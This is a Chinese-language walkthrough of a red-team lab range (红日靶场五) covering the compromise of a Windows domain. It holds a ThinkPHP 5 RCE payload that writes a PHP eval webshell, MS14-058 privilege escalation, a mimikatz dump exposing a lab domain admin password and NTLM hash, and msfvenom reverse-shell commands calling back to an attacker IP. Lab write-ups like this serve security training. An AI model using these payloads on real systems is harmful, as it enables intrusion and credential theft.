红日靶场五
感觉这个比前面几个简单一点(bushi)
解法一:
全程用CS做,配合一些插件比较容易可以做
首先扫一下开放了哪些端口
nmap -sS 192.168.111.150 -T4 -Pn
Starting Nmap 7.99 ( https://nmap.org ) at 2026-07-09 14:00 +0800
Nmap scan report for 192.168.111.150
Host is up (0.070s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
3306/tcp open mysql
Nmap done: 1 IP address (1 host up) scanned in 7.49 seconds
开放了80和3306,开放的端口不多,先看看80上跑的是什么服务

可以看到是ThinkPHP V5,知道版本后可以搜索一下有没有什么现成可以利用的CVE
可以验证漏洞存在

但按照上面文章中的方法写webshell写不进去,所以参考了另外一篇: ThinkPHP5系列远程代码执行漏洞复现getshell
payload:s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=1.php&vars[1][]=<?php @eval($_POST['1qaz']);?>

连接上webshell之后就可以上线CS了
上线后发现这是一台windows主机,权限是Administrator

先看看主机信息
beacon> shell systeminfo
[*] Tasked beacon to run: systeminfo
[+] host called home, sent: 41 bytes
[+] received output:
主机名: WIN7
OS 名称: Microsoft Windows 7 专业版
OS 版本: 6.1.7601 Service Pack 1 Build 7601
OS 制造商: Microsoft Corporation
OS 配置: 成员工作站
OS 构件类型: Multiprocessor Free
注册的所有人: Windows 用户
注册的组织:
产品 ID: 00371-177-0000061-85581
初始安装日期: 2020/3/5, 0:44:56
系统启动时间: 2026/7/9, 5:53:33
系统制造商: VMware, Inc.
系统型号: VMware Virtual Platform
系统类型: x64-based PC
处理器: 安装了 1 个处理器。
[01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2200 Mhz
BIOS 版本: Phoenix Technologies LTD 6.00, 2020/11/12
Windows 目录: C:\Windows
系统目录: C:\Windows\system32
启动设备: \Device\HarddiskVolume1
系统区域设置: zh-cn;中文(中国)
输入法区域设置: zh-cn;中文(中国)
时区: (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐
物理内存总量: 2,047 MB
可用的物理内存: 1,477 MB
虚拟内存: 最大值: 4,095 MB
虚拟内存: 可用: 3,300 MB
虚拟内存: 使用中: 795 MB
页面文件位置: C:\pagefile.sys
域: sun.com
登录服务器: 暂缺
修补程序: 暂缺
网卡: 安装了 2 个 NIC。
[01]: Intel(R) PRO/1000 MT Network Connection
连接名: wk1 waiwang
启用 DHCP: 否
IP 地址
[01]: 192.168.111.150
[02]: fe80::74ff:9ed7:53ab:d404
[02]: Intel(R) PRO/1000 MT Network Connection
连接名: 本地连接
启用 DHCP: 否
IP 地址
[01]: 192.168.138.136
[02]: fe80::edf4:9135:b0e6:cfc4

可以使用MS14-058提权

shell回连

现在已经提升至system权限,现在可以尝试探测内网了

域内只有一台主机(但我看其他WP里写是有两台,应该是我的问题)

但有多个账户,我们需要横向到域控的system
查看一下域控IP

可以看到这是一台多网卡主机,域控IP 192.168.138.138
用fscan扫一下
先上传fscan

然后进行扫描

开放了445端口,似乎可以用永恒之蓝,但CS上不太好操作~~(也可能是因为我不会)~~
所以我们用mimikatz : mimikatz sekurlsa::logonpasswords
[07/09 15:53:56] beacon> mimikatz sekurlsa::logonpasswords
[07/09 15:53:56] [*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[07/09 15:53:56] [+] host called home, sent: 788090 bytes
[07/09 15:53:58] [+] received output:
Authentication Id : 0 ; 131439 (00000000:0002016f)
Session : Batch from 0
User Name : Administrator
Domain : SUN
Logon Server : DC
Logon Time : 2026/7/9 5:54:08
SID : S-1-5-21-3388020223-1982701712-4030140183-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : SUN
* LM : c8c42d085b5e3da2e9260223765451f1
* NTLM : e8bea972b3549868cecd667a64a6ac46
* SHA1 : 3688af445e35efd8a4d4e0a9eb90b754a2f3a4ee
tspkg :
* Username : Administrator
* Domain : SUN
* Password : dc123.com
wdigest :
* Username : Administrator
* Domain : SUN
* Password : dc123.com
kerberos :
* Username : Administrator
* Domain : SUN.COM
* Password : dc123.com
ssp :
credman :
[00000000]
* Username : SUN\Administrator
* Domain : SUN\Administrator
* Password : dc123.com
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2026/7/9 5:53:50
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : WIN7$
Domain : SUN
Logon Server : (null)
Logon Time : 2026/7/9 5:53:50
SID : S-1-5-20
msv :
[00000003] Primary
* Username : WIN7$
* Domain : SUN
* NTLM : 57a7c3c04367ee520cc20f7fcd52ca72
* SHA1 : e78f8e8508562dafdb9ef67743f37cad7c7a8db1
tspkg :
wdigest :
* Username : WIN7$
* Domain : SUN
* Password : 5a a8 6b 7a 0c 89 7d 82 02 3b aa b5 14 80 25 8e 16 21 3d a0 45 ac 96 a2 be 9b d5 6a d1 5b 12 4c 47 fb 97 b1 5b 87 c3 f1 14 87 56 90 0c 1c 80 16 ea de 26 b9 5a 64 61 d0 f1 9a a5 b9 b9 f7 17 f0 d0 98 22 e6 77 cc b2 55 b3 11 39 a2 4c 07 07 1a 38 ca 8d af f7 c8 a1 1d 18 fd 80 34 20 7c 84 3e 4d f3 46 b0 47 d3 2a 97 fd 18 0d 0c 95 d2 ec 87 ba 88 32 da 0f e0 3b c8 d5 0a d3 47 d4 2e 8f 1b 23 41 ff 20 3d 81 f4 5f bf 04 bd 4a d9 4f cd 03 53 24 68 ff 88 23 ad 33 b1 6e 1e 88 b9 1d 1f 3b 72 e3 2e 29 6c f0 ea 77 bd 14 56 5a 3d ba 59 ed 7c ba 98 6e 15 4d 1a d0 97 1d 26 04 88 d2 b5 4c ee fe 09 dc 1c df 76 0c 2e be 09 57 43 b2 c4 9d 39 a4 86 28 df 36 03 48 61 a9 e5 04 4c 41 fe 4a 09 81 33 1d da db 48 5a ed 55 20 53 95 76 9f 3d
kerberos :
* Username : win7$
* Domain : SUN.COM
* Password : 5a a8 6b 7a 0c 89 7d 82 02 3b aa b5 14 80 25 8e 16 21 3d a0 45 ac 96 a2 be 9b d5 6a d1 5b 12 4c 47 fb 97 b1 5b 87 c3 f1 14 87 56 90 0c 1c 80 16 ea de 26 b9 5a 64 61 d0 f1 9a a5 b9 b9 f7 17 f0 d0 98 22 e6 77 cc b2 55 b3 11 39 a2 4c 07 07 1a 38 ca 8d af f7 c8 a1 1d 18 fd 80 34 20 7c 84 3e 4d f3 46 b0 47 d3 2a 97 fd 18 0d 0c 95 d2 ec 87 ba 88 32 da 0f e0 3b c8 d5 0a d3 47 d4 2e 8f 1b 23 41 ff 20 3d 81 f4 5f bf 04 bd 4a d9 4f cd 03 53 24 68 ff 88 23 ad 33 b1 6e 1e 88 b9 1d 1f 3b 72 e3 2e 29 6c f0 ea 77 bd 14 56 5a 3d ba 59 ed 7c ba 98 6e 15 4d 1a d0 97 1d 26 04 88 d2 b5 4c ee fe 09 dc 1c df 76 0c 2e be 09 57 43 b2 c4 9d 39 a4 86 28 df 36 03 48 61 a9 e5 04 4c 41 fe 4a 09 81 33 1d da db 48 5a ed 55 20 53 95 76 9f 3d
ssp :
credman :
Authentication Id : 0 ; 46412 (00000000:0000b54c)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2026/7/9 5:53:45
SID :
msv :
[00000003] Primary
* Username : WIN7$
* Domain : SUN
* NTLM : 57a7c3c04367ee520cc20f7fcd52ca72
* SHA1 : e78f8e8508562dafdb9ef67743f37cad7c7a8db1
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : WIN7$
Domain : SUN
Logon Server : (null)
Logon Time : 2026/7/9 5:53:45
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : WIN7$
* Domain : SUN
* Password : 5a a8 6b 7a 0c 89 7d 82 02 3b aa b5 14 80 25 8e 16 21 3d a0 45 ac 96 a2 be 9b d5 6a d1 5b 12 4c 47 fb 97 b1 5b 87 c3 f1 14 87 56 90 0c 1c 80 16 ea de 26 b9 5a 64 61 d0 f1 9a a5 b9 b9 f7 17 f0 d0 98 22 e6 77 cc b2 55 b3 11 39 a2 4c 07 07 1a 38 ca 8d af f7 c8 a1 1d 18 fd 80 34 20 7c 84 3e 4d f3 46 b0 47 d3 2a 97 fd 18 0d 0c 95 d2 ec 87 ba 88 32 da 0f e0 3b c8 d5 0a d3 47 d4 2e 8f 1b 23 41 ff 20 3d 81 f4 5f bf 04 bd 4a d9 4f cd 03 53 24 68 ff 88 23 ad 33 b1 6e 1e 88 b9 1d 1f 3b 72 e3 2e 29 6c f0 ea 77 bd 14 56 5a 3d ba 59 ed 7c ba 98 6e 15 4d 1a d0 97 1d 26 04 88 d2 b5 4c ee fe 09 dc 1c df 76 0c 2e be 09 57 43 b2 c4 9d 39 a4 86 28 df 36 03 48 61 a9 e5 04 4c 41 fe 4a 09 81 33 1d da db 48 5a ed 55 20 53 95 76 9f 3d
kerberos :
* Username : win7$
* Domain : SUN.COM
* Password : 5a a8 6b 7a 0c 89 7d 82 02 3b aa b5 14 80 25 8e 16 21 3d a0 45 ac 96 a2 be 9b d5 6a d1 5b 12 4c 47 fb 97 b1 5b 87 c3 f1 14 87 56 90 0c 1c 80 16 ea de 26 b9 5a 64 61 d0 f1 9a a5 b9 b9 f7 17 f0 d0 98 22 e6 77 cc b2 55 b3 11 39 a2 4c 07 07 1a 38 ca 8d af f7 c8 a1 1d 18 fd 80 34 20 7c 84 3e 4d f3 46 b0 47 d3 2a 97 fd 18 0d 0c 95 d2 ec 87 ba 88 32 da 0f e0 3b c8 d5 0a d3 47 d4 2e 8f 1b 23 41 ff 20 3d 81 f4 5f bf 04 bd 4a d9 4f cd 03 53 24 68 ff 88 23 ad 33 b1 6e 1e 88 b9 1d 1f 3b 72 e3 2e 29 6c f0 ea 77 bd 14 56 5a 3d ba 59 ed 7c ba 98 6e 15 4d 1a d0 97 1d 26 04 88 d2 b5 4c ee fe 09 dc 1c df 76 0c 2e be 09 57 43 b2 c4 9d 39 a4 86 28 df 36 03 48 61 a9 e5 04 4c 41 fe 4a 09 81 33 1d da db 48 5a ed 55 20 53 95 76 9f 3d
ssp :
credman :
直接抓到了域管理员 SUN\Administrator 的明文密码 dc123.com 和 NTLM 哈希 e8bea972b3549868cecd667a64a6ac46。这意味着已经完全控制域,可以立刻接管域控。
先创建一个监听器

注入令牌

通过psexec 派生会话,等待回连

成功拿下域控


读取flag

解法二(未成功)
全程只使用msf
建立webshell的过程是相同的,直接进行内网渗透
先用msf生成一个木马
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.111.25 LPORT=4444 -f exe -o exp.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.25 LPORT=4444 -f exe -o exp2.exe #这个更好用

上传
启动msf监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
run

拿到shell后查看权限

查看主机信息

使用MS14-058提权,用windows/meterpreter/reverse_tcp有一个坏处是默认是32位的payload,后面进行提权的时候要进行进程迁移,以及指定架构
sessions -i 1 # 进入会话
ps 列出进程
migrate <64位进程PID> # 迁移进程

msf exploit(windows/local/ms14_058_track_popup_menu) > show targets
Exploit targets:
=================
Id Name
-- ----
=> 0 Windows x86
1 Windows x64
msf exploit(windows/local/ms14_058_track_popup_menu) > set target 1
target => 1
但我这里怎么都无法拿到shell,先到此为止了(